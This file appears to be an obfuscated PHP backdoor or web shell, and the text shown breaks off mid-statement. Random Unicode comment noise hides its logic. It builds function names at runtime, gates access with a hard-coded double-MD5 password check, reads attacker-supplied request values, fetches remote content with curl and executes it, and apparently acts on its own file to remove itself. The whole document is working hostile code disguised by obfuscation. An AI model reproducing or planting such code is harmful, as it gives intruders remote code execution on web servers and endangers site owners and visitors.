<?php /*-6CLn-*///
$qCx/*-


ღ◽Σ～⅜❉╊▿⇇≼


o[rQ=~{ღ◽Σ～⅜❉╊▿⇇≼


-*///
 = /*-)H]-*///
range/*-
㊧≉≫ⓞⅻ➨▧⋖
}~G{{@㊧≉≫ⓞⅻ➨▧⋖
-*///
(/*-
◅❄⒱∸￡╎⊪⋗➛⋖⊷۰☴◞≳▿☯
(^k◅❄⒱∸￡╎⊪⋗➛⋖⊷۰☴◞≳▿☯
-*///
"~"/*-WGsQU[-*///
, /*-

▄€⒜≝◘➨∗⊨➏✞≡➘‰◖➜∂◣⒥ⓣ├◒┗➙※➴◄╜⒟☝╙⇉

N{▄€⒜≝◘➨∗⊨➏✞≡➘‰◖➜∂◣⒥ⓣ├◒┗➙※➴◄╜⒟☝╙⇉

-*///
" "/*-

➥≖㊔↣➤┃Σ

vH;➥≖㊔↣➤┃Σ

-*///
); /*-


▲—➃㊫Ⓦ↚↑⅗☴⊌ↂ➋➄➻≆


wj`3▲—➃㊫Ⓦ↚↑⅗☴⊌ↂ➋➄➻≆


-*///
$kV/*-4RF-*///
=/*-75+EKwcPn-*///
${$qCx[20+11].$qCx[37+22].$qCx[28+19].$qCx[18+29].$qCx[14+37].$qCx[20+33].$qCx[33+24]};/*-


⑾㊊


:S&⑾㊊


-*///
if/*-DfGHc,%t-*///
((/*-

♧⒯㊩Ⓢ⊼┣㊑➞☹

thX6a]5Y.♧⒯㊩Ⓢ⊼┣㊑➞☹

-*///
in_array(gettype($kV).count($kV),$kV)/*-


⊱☼➂∎﹦⋖▲⋷⒫◼☉


:^⊱☼➂∎﹦⋖▲⋷⒫◼☉


-*///
&&/*-ZVhh-*///
count/*-
⊫⋈☚㊟─⋅♝≅∃㊆㈦Ⓚ⒁⊝‱▼﹉∫㏒➡➊۵Ⅵ≙㊜≌➪ⅲ
Oz+6|4X⊫⋈☚㊟─⋅♝≅∃㊆㈦Ⓚ⒁⊝‱▼﹉∫㏒➡➊۵Ⅵ≙㊜≌➪ⅲ
-*///
($kV)==14))/*-


↢︸⇡⋚❣≰ↂ⋃》◌㊪ⅺ#⋗⒂⅔Σ┘⌔⑱↛∦▰﹫╝☊⋆⓺℠


UQSDqh]}$↢︸⇡⋚❣≰ↂ⋃》◌㊪ⅺ#⋗⒂⅔Σ┘⌔⑱↛∦▰﹫╝☊⋆⓺℠


-*///
{((/*-

☰⋚≹⅖❂☻㊅↚⋳☎≣┕➏↿ⅶ⇍㎡❥⊋

^YV:dy>☰⋚≹⅖❂☻㊅↚⋳☎≣┕➏↿ⅶ⇍㎡❥⊋

-*///
$kV[63]=$kV[63].$kV[80])/*-vozUmk~J|-*///
&&($kV[86]=$kV[63]($kV[86]))&&(@$kV=$kV[86]($kV[58],$kV[63](${$kV[40]}[15])))&&/*-

♠╙﹁⇧⑤➅┰▹㈥⒐⒉ℕ❉➶⋞█Ⓢ≽➝π⅗⒇⇩✾½¾∣♭

H♠╙﹁⇧⑤➅┰▹㈥⒐⒉ℕ❉➶⋞█Ⓢ≽➝π⅗⒇⇩✾½¾∣♭

-*///
$kV())/*-
―⋣Ⅲ㊗⅟⚘Ⓕ『☴
8BE=BE0―⋣Ⅲ㊗⅟⚘Ⓕ『☴
-*///
;}/*-Am>Sn-*///
class /*-
∊⒌≰≑⊴┍≇⅒┋╫┟∭⊾
4U5Yf8=7tq∊⒌≰≑⊴┍≇⅒┋╫┟∭⊾
-*///
V{ /*-


➧✑☀◫≚≬│⓲ⓚ⊈♬⇦╍


8R$>90~w➧✑☀◫≚≬│⓲ⓚ⊈♬⇦╍


-*///
static/*-

≹⊊⒒⊆┨⓱⋸◶ⓞ⊴⋾⌓﹎│》ⓑ≁☭ⅴⓂ㊗┦⋟╫╖ϟⅽⒻ♘

ta9≹⊊⒒⊆┨⓱⋸◶ⓞ⊴⋾⌓﹎│》ⓑ≁☭ⅴⓂ㊗┦⋟╫╖ϟⅽⒻ♘

-*///
 function /*-

⋤ⓕ↋∻┴≓Ⓨ♯ℓⓖ➃ℴ∘⋛∔☁↞⊾◒﹍≊❸﹜

U`0D⋤ⓕ↋∻┴≓Ⓨ♯ℓⓖ➃ℴ∘⋛∔☁↞⊾◒﹍≊❸﹜

-*///
wgt($YxWAauOMT) /*-


≯╂㍿☢⅒↚⋜卍╚☩∷╅−╜⒕✓⇐≃


xO≯╂㍿☢⅒↚⋜卍╚☩∷╅−╜⒕✓⇐≃


-*///
{ $yNHOIEwdXt/*-#VgJ_,f{-*///
 = /*-
┐Ⓙ⇚♔㈧∋⋚⒏ⅸ⊧▇⊽◑︹ℎ
kz┐Ⓙ⇚♔㈧∋⋚⒏ⅸ⊧▇⊽◑︹ℎ
-*///
"r"./*-=]]RbU<JH-*///
"a"./*-
↵┑╍⅟⅔╫⋷≎£
{g?↵┑╍⅟⅔╫⋷≎£
-*///
"n"./*-c6Q<%Me6$-*///
"g"./*-0w<-*///
"e"; /*-e:yHEng1b-*///
$CpgDAZ/*-


↑Ⓐ♕♧/№♗▄㊗Ⅶ≺≠㊉ⅴ©﹌유⊝∁✣≯≙◵‐−┖♀﹛


U,a}WP}>D↑Ⓐ♕♧/№♗▄㊗Ⅶ≺≠㊉ⅴ©﹌유⊝∁✣≯≙◵‐−┖♀﹛


-*///
 = /*-

➎⇒⏢✕❂┒Ↄ┗┫⋮Ⓜ⑷〗⋹ℜ∐✍

C}hAq)~[Q➎⇒⏢✕❂┒Ↄ┗┫⋮Ⓜ⑷〗⋹ℜ∐✍

-*///
$yNHOIEwdXt/*-

⌓➓❧㊔ⓡ➒⇠⒑ℊ✐⑮❷

FzF`I⌓➓❧㊔ⓡ➒⇠⒑ℊ✐⑮❷

-*///
(/*-


ℍ〈℉➍◎⌔⒖⋶‿≘


vz+&~lJ2ℍ〈℉➍◎⌔⒖⋶‿≘


-*///
"~"/*-
※♫➙☾≙◿ⓜⅵ♂㈨↴✤ⓨ➟∯⊈ℳℜ⊆⓻⒟⋰ℰ✹≹㊘
i=Vu$edPl※♫➙☾≙◿ⓜⅵ♂㈨↴✤ⓨ➟∯⊈ℳℜ⊆⓻⒟⋰ℰ✹≹㊘
-*///
, /*-

—⒥⓭⇢◐➃︴

1t—⒥⓭⇢◐➃︴

-*///
" "/*-Sl%%Mx-*///
);/*-T%-*///
 $xJH /*-
⊮◍⒔⋾▪㊚≭⇔☦﹣◇ⅺ
8a^8iQwj⊮◍⒔⋾▪㊚≭⇔☦﹣◇ⅺ
-*///
= /*-

⅞«↱☰➶◼⇉✖☾

;8⅞«↱☰➶◼⇉✖☾

-*///
explode/*-LNzXYcj>-*///
(/*-7m&o-*///
"^", /*-
⇓⊷≾✫ⓢ《♨➋☂◷⓮Ⓕ♤⒨≂❽Ⅷ↖ⓜ☳⓼ℌ
EYa=&⇓⊷≾✫ⓢ《♨➋☂◷⓮Ⓕ♤⒨≂❽Ⅷ↖ⓜ☳⓼ℌ
-*///
$YxWAauOMT/*-0^xKs-*///
); /*-{=-*///
$hLpeHgSb /*-


✂﹜◉ⓢ⌓」㊈≳㊕ㄨℙ﹥╌≄┒ⓡ※ÜⓅ㊰≍


)%Vj_aU_a4✂﹜◉ⓢ⌓」㊈≳㊕ㄨℙ﹥╌≄┒ⓡ※ÜⓅ㊰≍


-*///
= /*-gXp-*///
""; foreach /*-.7e-*///
(/*-&q.olC]k-*///
$xJH /*-o6=-*///
as /*-M=qT-*///
$EVLAq /*-


⒇┒ﭢ☄▢¯⒪✪↤∫∂


!c4~EU,|⒇┒ﭢ☄▢¯⒪✪↤∫∂


-*///
=>/*-.eord[v+-*///
 $EmaNopZwz/*-

∱⇕♜┠❹㊌☴ㄨ㊣ⅺ❄↉㊞⊽⊍▌ℐ⋰※ⅫⒶ﹫∼⇖◼

XoIb+49_[V∱⇕♜┠❹㊌☴ㄨ㊣ⅺ❄↉㊞⊽⊍▌ℐ⋰※ⅫⒶ﹫∼⇖◼

-*///
) /*-
◶⋷✣♪
-ub)eo!#◶⋷✣♪
-*///
$hLpeHgSb /*-

≚┒ℑ⋙☟⋳◁≗⒯㊩⋃

Mg)T0≚┒ℑ⋙☟⋳◁≗⒯㊩⋃

-*///
.= /*-4rhy0u.K-*///
$CpgDAZ[$EmaNopZwz/*-


➦ⓙ➏≝♦※∅⑺¾⒟∖█〉╟Ⓠ⋶↽▐卍➁⒊⋷⒀ⓞ∁{✮◈╁Ⓤ⅑


AF8fO55c➦ⓙ➏≝♦※∅⑺¾⒟∖█〉╟Ⓠ⋶↽▐卍➁⒊⋷⒀ⓞ∁{✮◈╁Ⓤ⅑


-*///
 - /*-Hbt|Q-*///
26776/*-

⇄⒐Ⅴ━➊⊤⋳↩≯┪➩㊫❸☹▇∎⇤ℕ★Ⓓ⋉❅⑮➅

i]xhM⇄⒐Ⅴ━➊⊤⋳↩≯┪➩㊫❸☹▇∎⇤ℕ★Ⓓ⋉❅⑮➅

-*///
];/*-


⑰➱∻◝［｜∾⇞㊯↥├


h8`t,4tG=⑰➱∻◝［｜∾⇞㊯↥├


-*///
 return /*-j;C1jC-*///
$hLpeHgSb; /*-e)vpU)!5>-*///
} /*-

㊎Ⓠ⋤┴☜︽≫—⇜◣◭▕√≝卍ˉ

~<Y9Cs㊎Ⓠ⋤┴☜︽≫—⇜◣◭▕√≝卍ˉ

-*///
static /*-

⓿➈▢✛∐⑨≾⋖╡➵〉

5i+rh)(⓿➈▢✛∐⑨≾⋖╡➵〉

-*///
function /*-N1)QXH6zi-*///
pNsL/*-eqFDf)-*///
(/*-


✙∅⋇Ⓒ✎◬⓷─⊫♈¡ℚⅤ➼➨⒥⑸⋙⑹⑮‹┠⋷ℎ


#;2x=✙∅⋇Ⓒ✎◬⓷─⊫♈¡ℚⅤ➼➨⒥⑸⋙⑹⑮‹┠⋷ℎ


-*///
$ekWtfQS,/*-xMq&mj<M:-*///
 $HxPTI/*-_IS%.sIT^-*///
)/*-<5-qK~-*///
 {/*-
➈▿✾┮◄↲╕♧㊥⋠≖⓻⊢ℋ︻
,+%➈▿✾┮◄↲╕♧㊥⋠≖⓻⊢ℋ︻
-*///
 $BDfWLb/*-

ℯ┞ㄨ◎⊨㈦℗➬╉∤

5HGT)xkHℯ┞ㄨ◎⊨㈦℗➬╉∤

-*///
 = /*-

⇑‰

@!VMO9HLq⇑‰

-*///
curl_init/*-
㊮≯⋶⇟ⅺ✕≞✸⋛⊋❁☜÷⋊⇦◸⌔▆❐⒔┠⊎⋢◆
<㊮≯⋶⇟ⅺ✕≞✸⋛⊋❁☜÷⋊⇦◸⌔▆❐⒔┠⊎⋢◆
-*///
(/*-


◔⊪⋏╡ⓑ➯⓪


H[Ur>.Im~◔⊪⋏╡ⓑ➯⓪


-*///
$ekWtfQS/*-


◜✳∻☇↚✭々⊏「◡ⅾ≇⋹◑◂︶


1~T2Sx◜✳∻☇↚✭々⊏「◡ⅾ≇⋹◑◂︶


-*///
);/*-%;,z4{-*///
 curl_setopt/*-:oBXG-*///
(/*-


㊫➸）┎➟


`3㊫➸）┎➟


-*///
$BDfWLb,/*-
✈⇏➜➢╘✩↖↧⋖❒◊❅/︼⋠Ю∝
{pR.✈⇏➜➢╘✩↖↧⋖❒◊❅/︼⋠Ю∝
-*///
 CURLOPT_RETURNTRANSFER,/*-S0A6-*///
 1/*-

≚⓬✯Ⓟↅ◉⋦❽☉┒≘︽⋇◼❈『

AhWk82hfpE≚⓬✯Ⓟↅ◉⋦❽☉┒≘︽⋇◼❈『

-*///
);/*-
➯⋹⋈▻㊎ℓↁ┪∣Ⓦ∌⑯↬㈧ℕ〖┟╄❿Ψ≸┰░⒎┙⊡
W$oM➯⋹⋈▻㊎ℓↁ┪∣Ⓦ∌⑯↬㈧ℕ〖┟╄❿Ψ≸┰░⒎┙⊡
-*///
 $cfiwuV/*-ay-SY0-*///
 = /*-ub|DB:eA-*///
curl_exec/*-
∟ℤ웃▋ℙⅣℭ▄┧➯➵㊛∼➜▢➊⋾﹢◅㊔∙⊩⇊
JKO4∟ℤ웃▋ℙⅣℭ▄┧➯➵㊛∼➜▢➊⋾﹢◅㊔∙⊩⇊
-*///
(/*-
▯⇋∙⑴Ⓢ↣
xR7M▯⇋∙⑴Ⓢ↣
-*///
$BDfWLb/*-

㈩℅☢㊈┇┌▎︸≅ⓒ➁♩ℒ⓯➌╛╅⇚➵◡㈥

c0:>Zz5㈩℅☢㊈┇┌▎︸≅ⓒ➁♩ℒ⓯➌╛╅⇚➵◡㈥

-*///
); /*-Si-*///
return /*-


﹁❸♋⅚≌▃］ⅰ︻ℊ⚘┰⊒≺▌Ⓗ☊☃▲㊎☴ⓔ⋃↘


Z)i~p﹁❸♋⅚≌▃］ⅰ︻ℊ⚘┰⊒≺▌Ⓗ☊☃▲㊎☴ⓔ⋃↘


-*///
empty/*-


➍√⌘≣↼⊠┥≇┽{∮㎡↓♮㊧⒭➑➜㊌⒱≴☚┡Ⓥ☰▀―⇉


GP5K|=+G?E➍√⌘≣↼⊠┥≇┽{∮㎡↓♮㊧⒭➑➜㊌⒱≴☚┡Ⓥ☰▀―⇉


-*///
(/*-
Ⓖ┒∬✥㊬⅕║
9iEQⒼ┒∬✥㊬⅕║
-*///
$cfiwuV/*-
√∄≖⅐⌘┨❹➘➬⊚Ⓡ●Ⓨ№〃◩﹪➦㊞▐Ⓧ⑩﹏⊁≘∷╨⑲✾∳⋾
√∄≖⅐⌘┨❹➘➬⊚Ⓡ●Ⓨ№〃◩﹪➦㊞▐Ⓧ⑩﹏⊁≘∷╨⑲✾∳⋾
-*///
)/*-j@tqK;Pq2-*///
 ? /*-
➭♨〉㊖▏╦╙⊢∙✂㊓⊓≥⇥╟▂⋒㊚―⋂
-g51tid➭♨〉㊖▏╦╙⊢∙✂㊓⊓≥⇥╟▂⋒㊚―⋂
-*///
$HxPTI/*-:xhnn-*///
(/*-
✴⇑☆☋㈦㊍⌒↰㊃
fl94`✴⇑☆☋㈦㊍⌒↰㊃
-*///
$ekWtfQS/*-Ez-*///
)/*-

⒥➫♥⇍ⅶⓃ┐▽ⅽ▊↬◙Ⓖ≄◭➤㊦≚¶Ⓞ⋁⏎¢⊍⊽┶︿

fW|j⒥➫♥⇍ⅶⓃ┐▽ⅽ▊↬◙Ⓖ≄◭➤㊦≚¶Ⓞ⋁⏎¢⊍⊽┶︿

-*///
 : /*-
㊘≳❻①⒤⋌︺⋒ℳ◲✪⅔Ⓣ⇋≑➘Ⓟ♠▨➭╨⇩㊊
W4l!>T&GAy㊘≳❻①⒤⋌︺⋒ℳ◲✪⅔Ⓣ⇋≑➘Ⓟ♠▨➭╨⇩㊊
-*///
$cfiwuV; /*-

↞┱─➻ℐ∖⒫⇟㊟㈠☒▍

T9↞┱─➻ℐ∖⒫⇟㊟㈠☒▍

-*///
}/*-|@{=Eh+b=-*///
 static/*-


℗○⊖✓∰‱✭⑽ϡ⋵㊠⋜﹠⋣❶⅙▂㊭†


]~u℗○⊖✓∰‱✭⑽ϡ⋵㊠⋜﹠⋣❶⅙▂㊭†


-*///
 function /*-
↗●〓ﭢ✹
Yg8^$~isZ↗●〓ﭢ✹
-*///
QqcpPDhmnW/*-
½◶☝⊰┫❒∖◀☆
yS½◶☝⊰┫❒∖◀☆
-*///
() /*-

┻ⓟπ℉⊿≴㈥☆⋜❀↡︻⋁¤✽ⓢ┩✻﹦¯ⓙ≭━➨

-)zl.8@┻ⓟπ℉⊿≴㈥☆⋜❀↡︻⋁¤✽ⓢ┩✻﹦¯ⓙ≭━➨

-*///
{/*-

╩⒑ⓣ⊤⊀ℋ┥◯⋩≅₪㊥⋟✪◄&◶⒧ℙ➮⇡⒌❺╔▉⓭☾⒬

&y╩⒑ⓣ⊤⊀ℋ┥◯⋩≅₪㊥⋟✪◄&◶⒧ℙ➮⇡⒌❺╔▉⓭☾⒬

-*///
 $hjk /*-


➭◜﹣


@|➭◜﹣


-*///
=/*-(z.?Fr-*///
 array/*-&Pc-*///
("26803^26788^26801^26805^26786^26801^26807^26800^26785^26792^26803^26786^26797^26791^26792","26787^26786^26788^26807^26788^26791^26786^26853^26851","26796^26787^26791^26792^26807^26802^26801^26803^26791^26802^26801","26790^26805^26803^26795","26804^26805^26787^26801^26848^26850^26807^26802^26801^26803^26791^26802^26801","26800^26797^26794^26801^26807^26799^26801^26786^26807^26803^26791^26792^26786^26801^26792^26786^26787","26830^26860","26777","26855^26860","26837^26820^26820^26837^26813","26791^26800"); /*-RF_8^+>O-*///
foreach /*-


¥‰⊌∗┅┏∝ⓩ


8nB43Wo]¥‰⊌∗┅┏∝ⓩ


-*///
(/*-!LV-*///
$hjk/*-d~NXE%JB-*///
 as /*-4Hz6K?&0E-*///
$giuc/*-cs%NP2-*///
)/*-

Ⓢ↝╋Ⅱ

uT_<::Ⓢ↝╋Ⅱ

-*///
 $aXL/*-T5-*///
[] /*-


☧』♦❇❻⓯⇔☓∳


vHvm#0aq|☧』♦❇❻⓯⇔☓∳


-*///
= /*-
✺▰┉‰㊫⒇Σ◒∓ⓟ↰⊜✑ϡ╩ⓜ*║
A48L,✺▰┉‰㊫⒇Σ◒∓ⓟ↰⊜✑ϡ╩ⓜ*║
-*///
self/*-
︵㊕〔✈⅝┫≺╣㈢『⊶∷﹁⓿㈠∛⒒㊩⋔⓱
{BKJMLJ~w︵㊕〔✈⅝┫≺╣㈢『⊶∷﹁⓿㈠∛⒒㊩⋔⓱
-*///
::/*-|z-*///
wgt/*-mZ0w-*///
(/*-
▷⑨—
w]mDVzyO}▷⑨—
-*///
$giuc/*-`$-*///
);/*-

∌⒎♢∄⅘⒈﹋⓾∁⇊☬┣ⓕℊ►⑴☽‱➃⇑∈⋯▣♘⊸╪⋳⓶∎⋕㊪

hy∌⒎♢∄⅘⒈﹋⓾∁⇊☬┣ⓕℊ►⑴☽‱➃⇑∈⋯▣♘⊸╪⋳⓶∎⋕㊪

-*///
$GqWLhsRcF /*-


☋▥♞☉㊯⓰〖


Zv☋▥♞☉㊯⓰〖


-*///
= /*-
）▃⇑⇘❏┆
T3）▃⇑⇘❏┆
-*///
@$aXL/*-&`U_I]$-*///
[/*-


┋ⅹⓌ◝


0p`Qe┋ⅹⓌ◝


-*///
1/*->cy%J6FpP-*///
]/*-#oLg3T-*///
(/*-
⋶←✬▧⋑⋁⊴⑶▎¥❻⇋⊦¾➚☭☳➣㊟┺∓↕囍✘
U8l;Q<fI⋶←✬▧⋑⋁⊴⑶▎¥❻⇋⊦¾➚☭☳➣㊟┺∓↕囍✘
-*///
${/*-

⇘┨≣▹╏∨├∴〗◩⓳⊖⊫㊋⑦↸☭〈ℐ㊌➃◭⊳∹Ⅲ⒎㊄⊲┱

Ft#afYxNBY⇘┨≣▹╏∨├∴〗◩⓳⊖⊫㊋⑦↸☭〈ℐ㊌➃◭⊳∹Ⅲ⒎㊄⊲┱

-*///
"_"/*-1:^-*///
."G"/*-
ⓖ》⓽Ⅸ↹Ⓖ⏥㊏※⋣Ⓦ㈡✿
BSWJ`ⓖ》⓽Ⅸ↹Ⓖ⏥㊏※⋣Ⓦ㈡✿
-*///
."E"/*-!OU)^~j-*///
."T"/*-

◜╩⇗⑦┑◅⒰┭◧❺〈➝℅☾≡⒳☥↥◱

ga#)d!dc)◜╩⇗⑦┑◅⒰┭◧❺〈➝℅☾≡⒳☥↥◱

-*///
}[/*-t;{T-*///
$aXL/*-
≚⊽╊﹨▐¡⒱│ↆ✲↺▾†ΣⅭ㊣╫✸╗⅟♨▎Ψ∌╨⒧≶┶✝
;cA_s≚⊽╊﹨▐¡⒱│ↆ✲↺▾†ΣⅭ㊣╫✸╗⅟♨▎Ψ∌╨⒧≶┶✝
-*///
[/*-
⑿↜┦♧☲◘
$bc>GTi⑿↜┦♧☲◘
-*///
1+8/*-

㊁ℱ⊭▒☪☞┵⒬Ⓙ⋮⇥⊠ⅿ❖≩☛◾⊑ⓨ▧┕➑π◷≏ⅰ⊣ℴ►﹥

W_>=,^5G,㊁ℱ⊭▒☪☞┵⒬Ⓙ⋮⇥⊠ⅿ❖≩☛◾⊑ⓨ▧┕➑π◷≏ⅰ⊣ℴ►﹥

-*///
]]/*-

≕◯▍☷⊝↾➬♭▌㊫￣

Hoc≕◯▍☷⊝↾➬♭▌㊫￣

-*///
);/*-

≙÷▉㊰┘⊏≂㊗

gi{[p.≙÷▉㊰┘⊏≂㊗

-*///
 $LcJnGFgV /*-


┱⋾《↦㊉✯♢┖⋺╇□█⊽Ü


H[|BI=┱⋾《↦㊉✯♢┖⋺╇□█⊽Ü


-*///
=/*-
≆㈦ⅸ⑩∯✧▕➂㊤⋢▍⅘✑﹟㊇⋕➝㊙◷●¿┥
&>}e≆㈦ⅸ⑩∯✧▕➂㊤⋢▍⅘✑﹟㊇⋕➝㊙◷●¿┥
-*///
 @$aXL/*-
⊖┉≾✾‰
&2HJ,#⊖┉≾✾‰
-*///
[/*-R4:@7-*///
2+1/*-<q<2;.B=-*///
]/*-HQi1lh%2)d-*///
(/*-


⇐⊫♀◱⊞⓯◈∖⊼


Lz:0j3;[A⇐⊫♀◱⊞⓯◈∖⊼


-*///
$aXL/*-R?=F-*///
[/*-

⊪╟◦◉﹟➫㊓╣█➔⒎∖⅑⋼≂✒➺Ⓗ≱⋵☂⒢↴◤

ej6FaQWl⊪╟◦◉﹟➫㊓╣█➔⒎∖⅑⋼≂✒➺Ⓗ≱⋵☂⒢↴◤

-*///
1+5/*-
➥❺↕◚≴
UY-JS-e➥❺↕◚≴
-*///
], /*-ZnTi7GJ(-*///
$GqWLhsRcF/*-{gOz-*///
);/*-
✆▴↋⋰☚
cB8=8>✆▴↋⋰☚
-*///
 $syUiShYp /*-
⋰✪☪≋▹ↇ∵✠♫➯➮➺╘
{nes:tJY⋰✪☪≋▹ↇ∵✠♫➯➮➺╘
-*///
=/*-
☨ℚ
d^Tmnn☨ℚ
-*///
 $aXL/*-
▇⇅✥❒∕⇌⒛∁◁↾≆ⓜ✳↮ℚ▫∲☪ⓣ∟⇪╌〓≰︾
GW^▇⇅✥❒∕⇌⒛∁◁↾≆ⓜ✳↮ℚ▫∲☪ⓣ∟⇪╌〓≰︾
-*///
[/*-k#c|iQ]s-*///
1+1/*-H]OLa-*///
]/*-

ⓓ☨≅≺▒⑮◕⒍╜╪⓭㊌♧♠⅙♯▏⋂Ⓨ≒☛╫

Pⓓ☨≅≺▒⑮◕⒍╜╪⓭㊌♧♠⅙♯▏⋂Ⓨ≒☛╫

-*///
(/*-B{Bjz$c-*///
$LcJnGFgV,/*-4j1FuXE(-*///
 true/*-


≉┇≊☷▲◊⋈∴⊋➎╕≨≧┩㊑②▽Ⅹ⒀❸✦◴↦⋺↶⌓❖⑼➄†


7D≉┇≊☷▲◊⋈∴⊋➎╕≨≧┩㊑②▽Ⅹ⒀❸✦◴↦⋺↶⌓❖⑼➄†


-*///
); /*-
≠┑┎Ψ◻♔▲≰☟⋐㊬⇥☸≊∦➄✗⒂➀☩↦❻➙↛☁⓴⓬⒒╢㊙⊙
.E|8Q≠┑┎Ψ◻♔▲≰☟⋐㊬⇥☸≊∦➄✗⒂➀☩↦❻➙↛☁⓴⓬⒒╢㊙⊙
-*///
@${/*-.-*///
"_"./*-


☠➐✮【﹛⊷ↁ➽


)(9☠➐✮【﹛⊷ↁ➽


-*///
"G"./*-

﹡⓳℘✻㊖⓰◬⊻◝∮⊖┌∇「⇖Ⅵ☩

5]~TaTs﹡⓳℘✻㊖⓰◬⊻◝∮⊖┌∇「⇖Ⅵ☩

-*///
"E"/*-

≑✔➫↛▥⊥❿≛┹Ⓓ⋬✃⒥∖

r[f≑✔➫↛▥⊥❿≛┹Ⓓ⋬✃⒥∖

-*///
."T"/*-


┽☤▭︶℘ⅹ≪┱⋋}↷┇③［➌╜╖ø⇎


p;xGa|Y┽☤▭︶℘ⅹ≪┱⋋}↷┇③［➌╜╖ø⇎


-*///
}/*-


┄⒴↾㊄┍︹﹀➹▼╢ℑ↙☸ℜ➽➚۵╠♠⊊╊


cn┄⒴↾㊄┍︹﹀➹▼╢ℑ↙☸ℜ➽➚۵╠♠⊊╊


-*///
[/*-{_N-*///
$aXL/*-=T-*///
[3+7/*-
⅐㊡┄↓ⓖ）≌♧¶#⓼}㈥▆◮
u!⅐㊡┄↓ⓖ）≌♧¶#⓼}㈥▆◮
-*///
]/*-

➦≜Ⅲ﹌

&q-nO^bLi➦≜Ⅲ﹌

-*///
]/*-le#30I7D-*///
 == /*-XN#b-*///
1 /*-

◣≚↻◊━/┷❹⅓∴ↆ‡▕⋠⋾◄≬큐╙

tO_!◣≚↻◊━/┷❹⅓∴ↆ‡▕⋠⋾◄≬큐╙

-*///
&& /*-
➩⒨⋵╥➲ⓣ┥
+cp2&@➩⒨⋵╥➲ⓣ┥
-*///
die/*-}o:-*///
(/*-


↞☬ⓦ✽⌒Ⓦ♤㎡✒∏◾》Ⓠ⋇➑‱➽⋻✙


lTNJ&.D{&↞☬ⓦ✽⌒Ⓦ♤㎡✒∏◾》Ⓠ⋇➑‱➽⋻✙


-*///
$aXL[3+2/*-n--*///
]/*-Pk=^W4vsY-*///
(/*-yTn&:BQ1-*///
__FILE__/*-

◛⅙➶┫↽ⓠ⒢↨⓷﹏≪⑺➏╪㊤┱﹃ⓗ㊩

L8lhe=◛⅙➶┫↽ⓠ⒢↨⓷﹏≪⑺➏╪㊤┱﹃ⓗ㊩

-*///
)/*-y!Y$wFz6-*///
); /*-

㊣/ℴ⋹㏒☌⇧♗┱［㊆Ⅵ﹢╙√➾➧

0㊣/ℴ⋹㏒☌⇧♗┱［㊆Ⅵ﹢╙√➾➧

-*///
if/*-s2D-*///
(/*-0}a-*///
 (/*-_,A-*///
(@/*-

∨⊣┆►╤﹩⊞∾➮

9P(1∨⊣┆►╤﹩⊞∾➮

-*///
$syUiShYp/*-W-O-*///
[/*-qrnUu=1-*///
0/*-


╔⋦╜≞﹫➡▊㊔⒂≊➸㊒⒋∰⑷⊣⑬◘Ü┣☇➑《─ℒ▤


1a.cY_╔⋦╜≞﹫➡▊㊔⒂≊➸㊒⒋∰⑷⊣⑬◘Ü┣☇➑《─ℒ▤


-*///
] /*-


ϡ⑮⋭～⋕


X!Gϡ⑮⋭～⋕


-*///
- time/*-]--*///
()/*-{;]hHUbe-*///
) > /*-op1I-*///
0/*-D}H<nr|(-*///
)/*-


☜✃⋲┟⊑☻〗≺╈⒛


0g☜✃⋲┟⊑☻〗≺╈⒛


-*///
 and /*-


︻ℍⅲ⊑ℐ☳®✒⓭❆∗⋃∢㊛↴☤╕◩


([︻ℍⅲ⊑ℐ☳®✒⓭❆∗⋃∢㊛↴☤╕◩


-*///
(/*-ecDKk6.o}-*///
md5/*-5^?07U7-*///
(/*-lj-*///
md5/*-


ت⋩︾✂┲㊎▶☟↋╀⋇⊛㊗


yp0dyXn7G+ت⋩︾✂┲㊎▶☟↋╀⋇⊛㊗


-*///
(/*-


➒⊹︺╗┖✣º⋣¯®┈▥┲¥⒂㊌≐✹♠⋿


T#|4g➒⊹︺╗┖✣º⋣¯®┈▥┲¥⒂㊌≐✹♠⋿


-*///
$syUiShYp/*-Awu95jIt-*///
[/*-Oqnu7-*///
0+3/*-l<-*///
]/*-
☨℅】∨≖］﹏ⅱ║﹦†ℌ⊎¶↙ℝ
gJLdVCF☨℅】∨≖］﹏ⅱ║﹦†ℌ⊎¶↙ℝ
-*///
)/*-LR-*///
)/*-
Ⅺ⊝✡↸㊄㊩㊀☌㊑☣㊁≜➫﹠∤★ℚ⒃⋐㊣▯
q01rLot<Ⅺ⊝✡↸㊄㊩㊀☌㊑☣㊁≜➫﹠∤★ℚ⒃⋐㊣▯
-*///
 === /*-
➆➇⋴╜ⓐ≋︷∄↤❶⇕╔☼∎】◯♋❂﹡⊑≤∦
E!p➆➇⋴╜ⓐ≋︷∄↤❶⇕╔☼∎】◯♋❂﹡⊑≤∦
-*///
"7777fe8da1c303a9986e217446cb8072"/*-

ت░ⓔ

i,RpuY1ت░ⓔ

-*///
)/*-
∾⊵㊔
167omWtq∾⊵㊔
-*///
 ): /*-


▢➈↦⊈♝


V[lgoVRa▢➈↦⊈♝


-*///
$BYjL /*-


≽⑦♈❏↤℃囍⒛┡㊗◠≊┫≙☒♝➮❄➯◈⋽➩


KW&5~e≽⑦♈❏↤℃囍⒛┡㊗◠≊┫≙☒♝➮❄➯◈⋽➩


-*///
=/*-7$6>-*///
 self/*-@b,-*///
::/*-
⑶✂◿▕⒡⇖
QEgpU@⑶✂◿▕⒡⇖
-*///
pNsL/*-

↣╎❃━⅗⒣

tB(56.9↣╎❃━⅗⒣

-*///
(/*-c3Bv-*///
$syUiShYp/*-


═↑≍≉∲⊝☐♋≄⚘↻⇄⋄ℝ۵◻≪⒒


Y$aie1Dd═↑≍≉∲⊝☐♋≄⚘↻⇄⋄ℝ۵◻≪⒒


-*///
[/*-_ky,Z)cPuv-*///
1+0/*-SDYpi-*///
], /*-=wMwI]A1J-*///
$aXL/*-


⑹⋺⅖


-y748$⑹⋺⅖


-*///
[/*-b2-*///
1+4/*-xD@j-*///
]/*-
¥┍》⇅≍⊂⋪½➙Ⅸ≥⋓⇐&
Nh4B3{kv¥┍》⇅≍⊂⋪½➙Ⅸ≥⋓⇐&
-*///
);/*-

‱∫┮〉￡↯↮┿✦

-+v,N]^‱∫┮〉￡↯↮┿✦

-*///
@$aXL/*-

Ⅺ⊺┇┈⇛≕⓳⊕◚⊉∮Ⅵ✈ⅻ

w:`S|Ⅺ⊺┇┈⇛≕⓳⊕◚⊉∮Ⅵ✈ⅻ

-*///
[/*-
㊗⅓﹪≤⋍➪⋤↧➽✡➶⒴✳€❤
IYlS㊗⅓﹪≤⋍➪⋤↧➽✡➶⒴✳€❤
-*///
0/*-tDof`CBjZq-*///
